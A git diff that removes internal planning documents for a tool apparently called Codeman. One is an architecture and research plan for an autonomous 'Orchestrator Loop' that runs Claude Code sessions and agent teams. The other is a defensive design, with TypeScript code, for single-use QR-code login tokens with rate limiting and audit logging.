- `src/web/ports/infra-port.ts` — Add `orchestratorLoop` to InfraPort
|
||||
- `src/types/index.ts` — Export orchestrator types
|
||||
|
||||
## Existing File Modifications Summary
|
||||
|
||||
| File | Change | Lines |
|
||||
|------|--------|-------|
|
||||
| `src/types/index.ts` | Add orchestrator barrel export | +1 |
|
||||
| `src/web/sse-events.ts` | Add 11 orchestrator events + SseEvent entries | +30 |
|
||||
| `src/web/public/constants.js` | Mirror 11 SSE events | +15 |
|
||||
| `src/web/routes/index.ts` | Export registerOrchestratorRoutes | +1 |
|
||||
| `src/web/ports/infra-port.ts` | Add orchestratorLoop to InfraPort | +3 |
|
||||
| `src/web/server.ts` | Initialize OrchestratorLoop, wire events, register routes | +40 |
|
||||
| `src/web/schemas.ts` | Add orchestrator Zod schemas | +20 |
|
||||
| `src/state-store.ts` | Add orchestrator state persistence | +20 |
|
||||
| `src/web/public/app.js` | Add orchestrator SSE listeners + panel toggle | +30 |
|
||||
| `src/web/public/index.html` | Add orchestrator-ui.js script tag | +1 |
|
||||
|
||||
**Total new code**: ~2,300 lines across 6 new files
|
||||
**Total modifications**: ~160 lines across 10 existing files
|
||||
|
||||
## Implementation Execution Order
|
||||
|
||||
This is the actual build order — each step is a commit checkpoint:
|
||||
|
||||
1. **Types** — `src/types/orchestrator.ts` + barrel export. Zero risk, pure types.
|
||||
2. **SSE events** — Add all 11 events to both `sse-events.ts` and `constants.js`. Wire in SseEvent namespace.
|
||||
3. **State persistence** — Add orchestrator state to StateStore. Small, isolated change.
|
||||
4. **Schemas** — Add Zod validation schemas for API input.
|
||||
5. **Planner** — `src/orchestrator-planner.ts`. Can test in isolation.
|
||||
6. **Verifier** — `src/orchestrator-verifier.ts`. Can test in isolation.
|
||||
7. **Core loop** — `src/orchestrator-loop.ts`. The big one. Depends on planner + verifier.
|
||||
8. **Prompts** — `src/prompts/orchestrator.ts`. Templates used by core loop.
|
||||
9. **Port + routes** — `src/web/ports/infra-port.ts` update + `src/web/routes/orchestrator-routes.ts`.
|
||||
10. **Server integration** — Wire OrchestratorLoop into WebServer. Routes become live.
|
||||
11. **Frontend** — `src/web/public/orchestrator-ui.js` + app.js listeners + index.html script tag.
|
||||
12. **Tests** — `test/orchestrator-*.test.ts`.
|
||||
13. **Typecheck + lint** — Fix all issues, ensure CI passes.
|
||||
|
||||
## Edge Cases & Error Handling
|
||||
|
||||
- **Session limit reached**: Queue tasks and wait for sessions to free up (existing SessionManager handles this)
|
||||
- **All sessions crash during phase**: Mark phase as failed, attempt replan
|
||||
- **Verification flaky**: `moderate` mode allows test retries; `lenient` skips AI review
|
||||
- **Plan too large**: Cap at 10 phases, 50 total tasks. Warn user.
|
||||
- **Context overflow**: Auto-compact between phases. Respawn if needed (orchestrator state is external).
|
||||
- **User pauses mid-phase**: Pause task assignment, don't cancel running tasks. Resume picks up where it left off.
|
||||
- **Network/API errors during planning**: Retry plan generation up to 2 times, then fail with clear message.
|
||||
- **Orchestrator vs Ralph conflict**: Mutually exclusive. Starting orchestrator stops Ralph if running. Starting Ralph stops orchestrator.
|
||||
|
||||
## Testing Strategy
|
||||
|
||||
- **Unit tests**: `test/orchestrator-planner.test.ts` — phase grouping algorithm, team strategy assignment
|
||||
- **Unit tests**: `test/orchestrator-verifier.test.ts` — verification logic with mocked sessions
|
||||
- **Integration tests**: `test/orchestrator-loop.test.ts` — state machine transitions, task lifecycle
|
||||
- **Route tests**: `test/routes/orchestrator-routes.test.ts` — API validation, status responses
|
||||
|
||||
All tests use `MockSession` pattern from existing test infrastructure. No real tmux needed.
|
||||
@@ -1,157 +0,0 @@
|
||||
# Orchestrator Loop — Research Findings
|
||||
|
||||
> Research doc for the new "Orchestrator Loop" feature. Not for GitHub.
|
||||
|
||||
## What We're Building
|
||||
|
||||
A new autonomous loop variant — **Orchestrator Loop** — that takes high-level user tasks, decomposes them into a detailed plan using team agents, and executes the plan step-by-step with quality gates. Unlike Ralph Loop (which executes a flat task queue), the Orchestrator coordinates **planning, delegation, and verification** as a continuous cycle.
|
||||
|
||||
**Core idea**: User inputs a goal → Orchestrator creates a detailed plan → spins up team agents for parallel execution → validates each step → adapts the plan based on results → delivers polished output.
|
||||
|
||||
## Existing Infrastructure Analysis
|
||||
|
||||
### What We Can Reuse
|
||||
|
||||
#### 1. Ralph Loop (`src/ralph-loop.ts`)
|
||||
- **Pattern**: Poll loop with `start() → tick() → stop()` lifecycle
|
||||
- **Reusable**: Event-driven task assignment, session completion handling, timeout management
|
||||
- **Limitation**: Flat task queue — no concept of phases, dependencies between task groups, or adaptive replanning
|
||||
- **Key insight**: `assignTaskToSession()` uses `session.sendInput(task.prompt)` — simple prompt injection into PTY
|
||||
|
||||
#### 2. Task Queue (`src/task-queue.ts`) + Task (`src/task.ts`)
|
||||
- **Already has**: Priority ordering, dependency tracking between tasks, completion phrase detection
|
||||
- **Limitation**: No task *groups* or *phases*. Dependencies are task-to-task, not phase-to-phase
|
||||
- **Key insight**: Tasks support `completionPhrase` — a string the task watches for in output. This is how Ralph knows a task is done
|
||||
|
||||
#### 3. Plan Orchestrator (`src/plan-orchestrator.ts`)
|
||||
- **Already has**: 2-agent plan generation (Research Agent → Planner Agent), TDD-aware plan items with P0/P1/P2 priorities
|
||||
- **Output**: `PlanItem[]` with dependencies, verification criteria, TDD phases, complexity ratings
|
||||
- **Limitation**: Plan generation only — no execution. Plans are generated then sit in state/UI for human review
|
||||
- **Key insight**: Uses `Session` directly to run Claude subagent instances for research and planning. Returns structured JSON
|
||||
|
||||
#### 4. Team Agents (`src/team-watcher.ts`, `~/.claude/teams/`)
|
||||
- **Already has**: Team creation, member tracking, filesystem inbox messaging, task management via `~/.claude/tasks/{team-name}/`
|
||||
- **Limitation**: Codeman can only *observe* teams (TeamWatcher is read-only polling), not *create* or *orchestrate* them
|
||||
- **Key insight**: Teams are a Claude Code feature. Codeman monitors them but doesn't control them. We can't programmatically create teammates — Claude Code does that when you use `CLAUDE_CODE_EXPERIMENTAL_AGENT_TEAMS=1`
|
||||
|
||||
#### 5. Respawn Controller (`src/respawn-controller.ts`)
|
||||
- **Already has**: Preset-based automation (ralph-todo, overnight-autonomous), circuit breaker, health scoring
|
||||
- **Key insight**: The `ralph-todo` preset (8s idle, 480min max) is designed for autonomous task execution. We'd need a new preset or make Orchestrator Loop set its own timing
|
||||
|
||||
#### 6. Session Auto-Ops (`src/session-auto-ops.ts`)
|
||||
- **Already has**: Auto-compact at token thresholds, auto-clear for context management
|
||||
- **Key insight**: Critical for long Orchestrator runs — prevents context overflow during multi-step execution
|
||||
|
||||
#### 7. Hooks (`src/hooks-config.ts`)
|
||||
- **Already has**: `idle_prompt`, `stop`, `teammate_idle`, `task_completed` hook events
|
||||
- **Key insight**: Hooks fire POST to `/api/hook-event` — this is how Codeman knows when Claude is idle, stopped, or completed a task. The Orchestrator Loop can listen to these same events
|
||||
|
||||
### What We Need to Build New
|
||||
|
||||
1. **Plan → Task decomposition**: Convert PlanOrchestrator output (PlanItem[]) into executable task groups with phase ordering
|
||||
2. **Multi-phase execution engine**: Execute plan phases sequentially, tasks within phases in parallel
|
||||
3. **Verification gates**: After each phase, run verification (test commands, AI review) before proceeding
|
||||
4. **Adaptive replanning**: When a task fails or verification fails, generate a recovery plan
|
||||
5. **Team agent orchestration**: Leverage Claude Code's agent teams for parallel execution within phases
|
||||
6. **Progress tracking & UI**: Real-time dashboard showing plan progress, phase status, agent activity
|
||||
|
||||
## How Teams Actually Work (Important Constraint)
|
||||
|
||||
After deep research, here's the reality of agent teams:
|
||||
|
||||
```
|
||||
User starts session with CLAUDE_CODE_EXPERIMENTAL_AGENT_TEAMS=1
|
||||
→ Claude Code creates a team-lead
|
||||
→ Team-lead spawns teammates (in-process threads)
|
||||
→ Teammates appear as subagents (detected by SubagentWatcher)
|
||||
→ Communication via ~/.claude/teams/{name}/inboxes/{member}.json
|
||||
→ Tasks tracked in ~/.claude/tasks/{team-name}/{N}.json
|
||||
```
|
||||
|
||||
**Codeman cannot programmatically create team members.** This is a Claude Code internal feature. However, Codeman CAN:
|
||||
- Start a session that has teams enabled
|
||||
- Send a prompt to the lead that instructs it to use agent teams
|
||||
- Monitor team activity via TeamWatcher
|
||||
- React to teammate_idle and task_completed hook events
|
||||
- Read team task status from the filesystem
|
||||
|
||||
**This means**: The Orchestrator Loop orchestrates at the *session prompt* level, not the *team member* level. We tell the lead what to do, and the lead decides how to use its team.
|
||||
|
||||
## Architecture Decision: Prompt-Level Orchestration
|
||||
|
||||
Given the team constraint, the Orchestrator Loop works by:
|
||||
|
||||
1. **Planning phase**: Use PlanOrchestrator to generate a detailed plan from user input
|
||||
2. **Execution phase**: Feed plan steps as prompts to sessions, one phase at a time
|
||||
3. **Verification phase**: After each phase, run verification prompts and check results
|
||||
4. **Adaptation phase**: If verification fails, generate recovery prompts
|
||||
|
||||
The "team agents" aspect works by:
|
||||
- Starting sessions with `CLAUDE_CODE_EXPERIMENTAL_AGENT_TEAMS=1`
|
||||
- Crafting prompts that *instruct the lead to delegate* to teammates
|
||||
- Monitoring team activity to track parallel progress
|
||||
- The lead agent is smart enough to decompose work across its team
|
||||
|
||||
## Key Technical Findings
|
||||
|
||||
### Session Input Mechanics
|
||||
```typescript
|
||||
// From session.ts - how we send prompts
|
||||
await session.sendInput(task.prompt); // Uses writeViaMux() internally
|
||||
// writeViaMux() does: tmux send-keys -l "prompt text" + tmux send-keys Enter
|
||||
// CRITICAL: Single-line only! Multi-line breaks Ink rendering
|
||||
```
|
||||
|
||||
### Completion Detection Chain
|
||||
```
|
||||
PTY output → RalphTracker.processData() → completion phrase fuzzy match
|
||||
→ CompletionConfidence scoring (multi-signal: promise tag + todos + exit signal)
|
||||
→ If confident → emit 'completionDetected'
|
||||
→ RalphLoop listens → marks task complete → assigns next
|
||||
```
|
||||
|
||||
### How Plan Items Map to Tasks
|
||||
```typescript
|
||||
// PlanItem has:
|
||||
interface PlanItem {
|
||||
id: string; // "P0-001"
|
||||
content: string; // "Implement error handling for API endpoints"
|
||||
priority: 'P0' | 'P1' | 'P2';
|
||||
dependencies: string[]; // ["P0-000"] — other PlanItem IDs
|
||||
verificationCriteria: string;
|
||||
testCommand: string;
|
||||
tddPhase: 'setup' | 'test' | 'impl' | 'verify' | 'review';
|
||||
complexity: 'low' | 'medium' | 'high';
|
||||
}
|
||||
|
||||
// Task has:
|
||||
interface CreateTaskOptions {
|
||||
prompt: string;
|
||||
priority: number;
|
||||
dependencies: string[]; // Task IDs
|
||||
completionPhrase: string;
|
||||
timeoutMs: number;
|
||||
}
|
||||
|
||||
// Natural mapping: PlanItem.content → Task.prompt
|
||||
// PlanItem.dependencies → Task.dependencies
|
||||
// PlanItem.priority → Task.priority (P0=100, P1=50, P2=10)
|
||||
// PlanItem.verificationCriteria → verification task prompt
|
||||
```
|
||||
|
||||
### Context Management for Long Runs
|
||||
- Auto-compact at ~110k tokens (configurable)
|
||||
- Auto-clear at ~140k tokens (configurable)
|
||||
- Respawn cycling: kill + restart session to reset context entirely
|
||||
- For Orchestrator: we want compact between phases, respawn between major milestones
|
||||
|
||||
## Risk Assessment
|
||||
|
||||
| Risk | Severity | Mitigation |
|
||||
|------|----------|------------|
|
||||
| Context overflow during complex phases | High | Auto-compact between tasks, respawn between phases |
|
||||
| Team agents not predictable | Medium | Orchestrate at session level, let Claude decide team delegation |
|
||||
| Plan too ambitious → infinite loop | High | Phase budgets (max attempts per phase), circuit breaker |
|
||||
| Verification too strict → blocks progress | Medium | Configurable strictness, human override via UI |
|
||||
| Single-line prompt limit | Medium | Use CLAUDE.md file for complex instructions, prompt references file |
|
||||
| Long planning phase delays execution | Low | Show plan for approval before execution |
|
||||
@@ -1,723 +0,0 @@
|
||||
# QR Code Authentication Plan
|
||||
|
||||
> Ephemeral, single-use auth tokens embedded in the tunnel QR code — scan to auto-authenticate, while the bare tunnel URL stays password-protected.
|
||||
|
||||
## Problem
|
||||
|
||||
When the Cloudflare tunnel is active, anyone who discovers the `*.trycloudflare.com` URL can access Codeman (they just need the Basic Auth password, or if no password is set, full open access). The QR code currently encodes the raw tunnel URL — it provides no additional security. We want:
|
||||
|
||||
1. **Scanning the QR code** → seamless, instant access (no password prompt)
|
||||
2. **Having only the URL** → blocked by Basic Auth (no access without credentials)
|
||||
|
||||
## Design
|
||||
|
||||
### Core Concept: Ephemeral Single-Use QR Tokens
|
||||
|
||||
The server maintains a rotating pool of short-lived, single-use tokens. The QR code encodes a short URL containing a lookup code that maps to the real token server-side. When scanned, the server validates the token, atomically consumes it, issues a session cookie, and redirects to `/`. The token is **not** the password — it's a separate, independent, ephemeral authentication pathway.
|
||||
|
||||
```
|
||||
Desktop → displays QR (auto-refreshes every 60s via SSE)
|
||||
QR Code → https://abc-xyz.trycloudflare.com/q/Xk9mQ3
|
||||
Phone → scans, GET /q/Xk9mQ3
|
||||
Server → looks up short code via Map (hash-based, timing-safe)
|
||||
→ finds token record → validates TTL
|
||||
→ atomically consumes token (single-use)
|
||||
→ issues codeman_session cookie
|
||||
→ 302 redirect to /
|
||||
→ SSE push: new QR with embedded SVG for desktop display
|
||||
→ desktop toast: "Device [IP] authenticated via QR"
|
||||
→ audit log entry to session-lifecycle.jsonl
|
||||
User → lands on app, fully authenticated
|
||||
```
|
||||
|
||||
Someone who only has `https://abc-xyz.trycloudflare.com/` gets the standard Basic Auth prompt.
|
||||
|
||||
### Token Properties
|
||||
|
||||
| Property | Value |
|
||||
|----------|-------|
|
||||
| Length | 32 bytes (256 bits entropy) |
|
||||
| Generation | `crypto.randomBytes(32).toString('hex')` |
|
||||
| Short code | 6 chars base62, rejection-sampled (no modulo bias) |
|
||||
| Short code derivation | Independent random generation (not derived from token) |
|
||||
| Storage | In-memory `Map<shortCode, QrTokenRecord>` (no disk persistence) |
|
||||
| TTL | 60 seconds (auto-rotation via timer), 90s grace for previous token |
|
||||
| Effective window | Up to 90 seconds for the previous token (documented, not hidden) |
|
||||
| Usage | **Single-use** — atomically consumed on first valid scan |
|
||||
| URL format | Short code in path (`/q/Xk9mQ3`), not query params |
|
||||
| URL length | ~53-56 chars total — targets QR Version 4 (33x33) for fast scanning |
|
||||
| Scope | Only valid when `CODEMAN_PASSWORD` is set (no point without auth) |
|
||||
| Lookup | `Map.get()` — hash-based O(1), no timing side-channel |
|
||||
|
||||
### Why This Design?
|
||||
|
||||
**Why not embed the password directly?**
|
||||
- Password would appear in browser history, Cloudflare edge logs, and URL bars
|
||||
- Password can't be rotated independently from QR access
|
||||
|
||||
**Why not a long-lived multi-use token? (original design)**
|
||||
- A static token is functionally a second password — if the QR image leaks (screenshot shared, shoulder surfing, Cloudflare logs), the attacker has permanent access
|
||||
- The USENIX Security 2025 paper ["Demystifying the (In)Security of QR Code-based Login"](https://www.usenix.org/conference/usenixsecurity25/presentation/zhang-xin) found 47 of the top-100 websites vulnerable due to exactly this pattern — missing single-use enforcement and long-lived tokens were 2 of the 6 critical design flaws identified
|
||||
|
||||
**Why short codes in the URL path instead of query params?**
|
||||
- Query params (`?t=TOKEN`) leak into browser history, address bar, `Referer` headers, and Cloudflare edge logs
|
||||
- Path-based short codes (`/q/Xk9mQ3`) are opaque references — the real token never appears in URLs
|
||||
- Short codes are 6-char base62 (62^6 = 56.8 billion combinations), sufficient for lookup since they're backed by the full 256-bit token for validation and rate-limited to 10 attempts/IP
|
||||
- The short `/q/` path (vs `/qr-auth/`) saves 7 bytes, helping keep the QR at Version 4 (33x33 modules) instead of Version 5 (37x37) — faster scanning on budget phones
|
||||
|
||||
## Auth Flow Diagram
|
||||
|
||||
```
|
||||
┌─────────────┐ scan QR ┌──────────────────────────────────────┐
|
||||
│ Mobile │ ────────────→ │ GET /q/Xk9mQ3 │
|
||||
│ Device │ │ │
|
||||
└─────────────┘ │ 1. Auth middleware sees /q/ │
|
||||
│ → skips Basic Auth check │
|
||||
│ 2. Route handler: Map.get(shortCode) │
|
||||
│ → hash-based lookup (timing-safe) │
|
||||
│ 3. Checks TTL (90s grace for prev) │
|
||||
│ → token not expired? │
|
||||
│ 4. Checks consumed flag │
|
||||
│ → not already used? │
|
||||
│ 5. Atomically marks token consumed │
|
||||
│ 6. Issues codeman_session cookie │
|
||||
│ 7. 302 redirect to / │
|
||||
│ 8. Audit log → session-lifecycle.jsonl│
|
||||
│ 9. SSE push: tunnel:qrRegenerated │
|
||||
│ → desktop refreshes QR (SVG inline)│
|
||||
│ 10. Desktop toast: "Device auth'd" │
|
||||
└──────────────────────────────────────┘
|
||||
|
||||
┌─────────────┐ replay URL ┌──────────────────────────────────────┐
|
||||
│ Attacker │ ────────────→ │ GET /q/Xk9mQ3 │
|
||||
│ (stale code) │ │ │
|
||||
└─────────────┘ │ 1. Map.get(shortCode) → not found │
|
||||
│ OR token consumed OR expired │
|
||||
│ 2. Increment QR rate limit counter │
|
||||
│ (separate from Basic Auth counter) │
|
||||
│ 3. 401 Unauthorized │
|
||||
└──────────────────────────────────────┘
|
||||
|
||||
┌─────────────┐ URL only ┌──────────────────────────────────────┐
|
||||
│ Attacker │ ────────────→ │ GET / │
|
||||
│ (no token) │ │ │
|
||||
└─────────────┘ │ 1. Auth middleware checks cookie │
|
||||
│ → no cookie │
|
||||
│ 2. Checks Basic Auth header │
|
||||
│ → no header │
|
||||
│ 3. Returns 401 + WWW-Authenticate │
|
||||
│ → Browser shows password popup │
|
||||
└──────────────────────────────────────┘
|
||||
```
|
||||
|
||||
## Implementation
|
||||
|
||||
### 1. Token Manager — `src/tunnel-manager.ts`
|
||||
|
||||
Add a `QrTokenRecord` type and token rotation logic to `TunnelManager`. The token rotates every 60 seconds. A consumed token is immediately replaced. Up to 2 tokens can be valid simultaneously (current + previous, to handle the race where someone scans right as rotation happens). The previous token has a 90s grace period (not a full extra 60s — only enough to cover the scan-during-rotation race).
|
||||
|
||||
**Design decisions from security review:**
|
||||
- **Map-based lookup** (not array scan) — `Map.get()` uses hash-based O(1) lookup, eliminating timing side-channels from string comparison
|
||||
- **Rejection sampling** for short codes — avoids modulo bias (`256 % 62 != 0` gives 25% overrepresentation for first 6 charset chars)
|
||||
- **SVG cache** — stores generated QR SVG per rotation cycle to avoid regenerating on every `/api/tunnel/qr` poll
|
||||
- **Separate rate limit counter** — QR auth failures tracked independently from Basic Auth failures
|
||||
|
||||
```typescript
|
||||
import { randomBytes } from 'node:crypto';
|
||||
|
||||
interface QrTokenRecord {
|
||||
token: string; // 64 hex chars (256 bits)
|
||||
shortCode: string; // 6 chars base62 (for URL path)
|
||||
createdAt: number; // Date.now()
|
||||
consumed: boolean; // single-use flag
|
||||
}
|
||||
|
||||
const QR_TOKEN_TTL_MS = 60_000; // 60 seconds
|
||||
const QR_TOKEN_GRACE_MS = 90_000; // 90s grace for previous token (scan-during-rotation)
|
||||
const SHORT_CODE_LENGTH = 6;
|
||||
const QR_RATE_LIMIT_MAX = 30; // global rate limit across all IPs
|
||||
const QR_RATE_LIMIT_WINDOW_MS = 60_000; // 1 minute window
|
||||
|
||||
/** Rejection-sampled short code generation — no modulo bias */
|
||||
function generateShortCode(): string {
|
||||
const chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789';
|
||||
const maxUnbiased = 248; // largest multiple of 62 that fits in a byte (248 = 62 * 4)
|
||||
const result: string[] = [];
|
||||
while (result.length < SHORT_CODE_LENGTH) {
|
||||
const [byte] = randomBytes(1);
|
||||
if (byte < maxUnbiased) result.push(chars[byte % 62]);
|
||||
// else: discard and re-draw (rejection sampling)
|
||||
}
|
||||
return result.join('');
|
||||
}
|
||||
|
||||
export class TunnelManager extends EventEmitter {
|
||||
// Map-based lookup: shortCode → QrTokenRecord (timing-safe, no string comparison)
|
||||
private qrTokensByCode = new Map<string, QrTokenRecord>();
|
||||
private currentShortCode: string | null = null;
|
||||
private rotationTimer: ReturnType<typeof setInterval> | null = null;
|
||||
|
||||
// SVG cache — regenerated only on token rotation, not per request
|
||||
private cachedQrSvg: { shortCode: string; svg: string } | null = null;
|
||||
|
||||
// Global rate limit counter (separate from Basic Auth rate limiting)
|
||||
private qrAttemptCount = 0;
|
||||
private qrRateLimitResetTimer: ReturnType<typeof setInterval> | null = null;
|
||||
|
||||
constructor() {
|
||||
super();
|
||||
this.rotateToken();
|
||||
this.rotationTimer = setInterval(() => this.rotateToken(), QR_TOKEN_TTL_MS);
|
||||
this.qrRateLimitResetTimer = setInterval(() => { this.qrAttemptCount = 0; }, QR_RATE_LIMIT_WINDOW_MS);
|
||||
}
|
||||
|
||||
private rotateToken(): void {
|
||||
const record: QrTokenRecord = {
|
||||
token: randomBytes(32).toString('hex'),
|
||||
shortCode: generateShortCode(),
|
||||
createdAt: Date.now(),
|
||||
consumed: false,
|
||||
};
|
||||
|
||||
// Evict expired tokens from the Map
|
||||
const now = Date.now();
|
||||
for (const [code, rec] of this.qrTokensByCode) {
|
||||
if (now - rec.createdAt > QR_TOKEN_GRACE_MS || rec.consumed) {
|
||||
this.qrTokensByCode.delete(code);
|
||||
}
|
||||
}
|
||||
|
||||
this.qrTokensByCode.set(record.shortCode, record);
|
||||
this.currentShortCode = record.shortCode;
|
||||
this.cachedQrSvg = null; // invalidate SVG cache
|
||||
this.emit('qrTokenRotated');
|
||||
}
|
||||
|
||||
/** Get the current (newest) token's short code for QR URL */
|
||||
getCurrentShortCode(): string | undefined {
|
||||
return this.currentShortCode ?? undefined;
|
||||
}
|
||||
|
||||
/** Get cached QR SVG, regenerating only if the short code changed */
|
||||
async getQrSvg(tunnelUrl: string): Promise<string> {
|
||||
const code = this.currentShortCode;
|
||||
if (!code) throw new Error('No QR token available');
|
||||
if (this.cachedQrSvg?.shortCode === code) return this.cachedQrSvg.svg;
|
||||
const QRCode = require('qrcode');
|
||||
const svg = await QRCode.toString(`${tunnelUrl}/q/${code}`, { type: 'svg', margin: 2, width: 256 });
|
||||
this.cachedQrSvg = { shortCode: code, svg };
|
||||
return svg;
|
||||
}
|
||||
|
||||
/**
|
||||
* Validate and atomically consume a token by short code.
|
||||
* Returns { success, ip?, ua? } for audit logging on success.
|
||||
* Map.get() is hash-based — no timing side-channel from string comparison.
|
||||
*/
|
||||
consumeToken(shortCode: string): boolean {
|
||||
// Global rate limit (across all IPs)
|
||||
if (this.qrAttemptCount >= QR_RATE_LIMIT_MAX) return false;
|
||||
this.qrAttemptCount++;
|
||||
|
||||
const record = this.qrTokensByCode.get(shortCode);
|
||||
if (!record) return false;
|
||||
if (record.consumed) return false;
|
||||
|
||||
const now = Date.now();
|
||||
if (now - record.createdAt > QR_TOKEN_GRACE_MS) return false;
|
||||
|
||||
// Atomic consume (single-threaded JS = no race)
|
||||
record.consumed = true;
|
||||
// Immediately rotate so desktop gets a fresh QR
|
||||
this.rotateToken();
|
||||
this.emit('qrTokenRegenerated');
|
||||
return true;
|
||||
}
|
||||
|
||||
/** Force-regenerate (manual revocation via API) */
|
||||
regenerateQrToken(): void {
|
||||
// Invalidate all existing tokens
|
||||
this.qrTokensByCode.clear();
|
||||
this.currentShortCode = null;
|
||||
this.rotateToken();
|
||||
this.emit('qrTokenRegenerated');
|
||||
}
|
||||
|
||||
stopRotation(): void {
|
||||
if (this.rotationTimer) {
|
||||
clearInterval(this.rotationTimer);
|
||||
this.rotationTimer = null;
|
||||
}
|
||||
if (this.qrRateLimitResetTimer) {
|
||||
clearInterval(this.qrRateLimitResetTimer);
|
||||
this.qrRateLimitResetTimer = null;
|
||||
}
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
### 2. Auth Middleware Bypass — `src/web/middleware/auth.ts`
|
||||
|
||||
Add `/q/` to the bypass list (same pattern as `/api/hook-event`). The route handler itself handles token validation and rate limiting.
|
||||
|
||||
```typescript
|
||||
// In the onRequest hook, add before Basic Auth check:
|
||||
if (req.url.startsWith('/q/')) {
|
||||
done(); // Let the route handler deal with token validation
|
||||
return;
|
||||
}
|
||||
```
|
||||
|
||||
**Important**: Unlike `/api/hook-event` (localhost-only), `/q/` must be reachable from any IP (remote devices scan the QR). Rate limiting is handled by two independent mechanisms:
|
||||
1. **Per-IP rate limit** — reuses the `authFailures` StaleExpirationMap (10 attempts/IP/15min), but tracked via a **separate counter** from Basic Auth failures (so a user who fat-fingers their password doesn't burn their QR attempts)
|
||||
2. **Global path rate limit** — `TunnelManager.qrAttemptCount` caps total QR attempts to 30/minute across all IPs, defending against distributed brute force
|
||||
|
||||
### 3. Auto-Auth Route — `src/web/routes/system-routes.ts`
|
||||
|
||||
Add `GET /q/:code` as a top-level route (not under `/api/`):
|
||||
|
||||
```typescript
|
||||
app.get('/q/:code', async (req, reply) => {
|
||||
const shortCode = (req.params as { code: string }).code;
|
||||
const authPassword = process.env.CODEMAN_PASSWORD;
|
||||
|
||||
// No point if auth isn't enabled
|
||||
if (!authPassword) {
|
||||
return reply.redirect('/');
|
||||
}
|
||||
|
||||
// Per-IP rate limit (separate counter from Basic Auth failures)
|
||||
const clientIp = req.ip;
|
||||
const qrFailures = ctx.authState.qrAuthFailures?.get(clientIp) ?? 0;
|
||||
if (qrFailures >= 10) {
|
||||
return reply.code(429).send('Too Many Requests');
|
||||
}
|
||||
|
||||
// Validate and atomically consume the token
|
||||
// consumeToken() also checks the global rate limit (30/min across all IPs)
|
||||
if (!shortCode || !ctx.tunnelManager.consumeToken(shortCode)) {
|
||||
ctx.authState.qrAuthFailures?.set(clientIp, qrFailures + 1);
|
||||
return reply.code(401).send('Invalid or expired QR code');
|
||||
}
|
||||
|
||||
// Issue session cookie (same as Basic Auth success path)
|
||||
const sessionToken = randomBytes(32).toString('hex');
|
||||
const clientUA = req.headers['user-agent'] ?? '';
|
||||
ctx.authState.authSessions?.set(sessionToken, {
|
||||
ip: clientIp,
|
||||
ua: clientUA,
|
||||
createdAt: Date.now(),
|
||||
});
|
||||
ctx.authState.qrAuthFailures?.delete(clientIp);
|
||||
|
||||
// Audit log — write to session-lifecycle.jsonl for forensic analysis
|
||||
ctx.lifecycleLog?.append({
|
||||
event: 'qr_auth',
|
||||
ip: clientIp,
|
||||
ua: clientUA,
|
||||
timestamp: Date.now(),
|
||||
shortCodePrefix: shortCode.slice(0, 3) + '***', // partial for privacy
|
||||
});
|
||||
|
||||
reply.setCookie(AUTH_COOKIE_NAME, sessionToken, {
|
||||
httpOnly: true,
|
||||
secure: ctx.https,
|
||||
sameSite: 'lax',
|
||||
maxAge: 86400, // 24h
|
||||
path: '/',
|
||||
});
|
||||
|
||||
// Broadcast auth notification — desktop sees who authenticated (QRLjacking detection)
|
||||
broadcast('tunnel:qrAuthUsed', {
|
||||
ip: clientIp,
|
||||
ua: clientUA,
|
||||
timestamp: Date.now(),
|
||||
});
|
||||
|
||||
return reply.redirect('/');
|
||||
});
|
||||
```
|
||||
|
||||
### 4. Update QR Code URL — `src/web/routes/system-routes.ts`
|
||||
|
||||
Modify `/api/tunnel/qr` to encode the short-code URL. Uses the `TunnelManager.getQrSvg()` cache — SVG is regenerated only when the token rotates, not on every request.
|
||||
|
||||
```typescript
|
||||
app.get('/api/tunnel/qr', async (_req, reply) => {
|
||||
const url = ctx.tunnelManager.getUrl();
|
||||
if (!url) {
|
||||
return reply.code(404).send(createErrorResponse(ApiErrorCode.NOT_FOUND, 'Tunnel not running'));
|
||||
}
|
||||
|
||||
const authPassword = process.env.CODEMAN_PASSWORD;
|
||||
|
||||
// If auth is enabled, use the cached SVG with embedded short code
|
||||
if (authPassword) {
|
||||
const svg = await ctx.tunnelManager.getQrSvg(url);
|
||||
return { svg, authEnabled: true };
|
||||
}
|
||||
|
||||
// No auth — just encode the raw tunnel URL
|
||||
const QRCode = require('qrcode');
|
||||
const svg = await QRCode.toString(url, { type: 'svg', margin: 2, width: 256 });
|
||||
return { svg, authEnabled: false };
|
||||
});
|
||||
```
|
||||
|
||||
### 5. Token Regeneration Endpoint — `src/web/routes/system-routes.ts`
|
||||
|
||||
Manual revocation — invalidates ALL existing tokens and creates a fresh one:
|
||||
|
||||
```typescript
|
||||
app.post('/api/tunnel/qr/regenerate', async () => {
|
||||
ctx.tunnelManager.regenerateQrToken();
|
||||
return { success: true };
|
||||
});
|
||||
```
|
||||
|
||||
### 6. Frontend Updates — `src/web/public/app.js`
|
||||
|
||||
#### QR Overlay Changes
|
||||
|
||||
- **Auto-refresh via inline SVG**: Listen for `tunnel:qrRotated` SSE events which now include the SVG directly in the payload — no extra HTTP fetch needed, sub-50ms refresh on desktop.
|
||||
- **Countdown indicator**: Small "expires in Xs" text under the QR that counts down from 60. Reassures the user the QR is live and not stale.
|
||||
- **Regenerate button**: "Regenerate QR" button. Calls `POST /api/tunnel/qr/regenerate` — SSE event delivers the new SVG.
|
||||
- **Auth badge**: Lock icon or "Single-use auth" label when auth is active.
|
||||
- **URL display**: Show the raw tunnel URL (not the auth URL) for manual copy — users who copy the URL authenticate via Basic Auth. The QR is the fast path.
|
||||
- **Auth notification toast**: When `tunnel:qrAuthUsed` fires, show a 10-second toast: "Device [IP] authenticated via QR (Safari). Not you? [Revoke]". This is the primary QRLjacking detection mechanism (USENIX Flaw-5).
|
||||
|
||||
```javascript
|
||||
// Auto-refresh QR on rotation — SVG is inline in the event payload
|
||||
addListener('tunnel:qrRotated', (data) => {
|
||||
if (data.svg) {
|
||||
updateQrDisplay(data.svg); // direct DOM update, no fetch
|
||||
} else {
|
||||
refreshTunnelQR(); // fallback: fetch from API
|
||||
}
|
||||
});
|
||||
|
||||
// Also refresh on manual regeneration
|
||||
addListener('tunnel:qrRegenerated', (data) => {
|
||||
if (data.svg) {
|
||||
updateQrDisplay(data.svg);
|
||||
} else {
|
||||
refreshTunnelQR();
|
||||
}
|
||||
});
|
||||
|
||||
// QRLjacking detection — notify desktop user when QR is consumed
|
||||
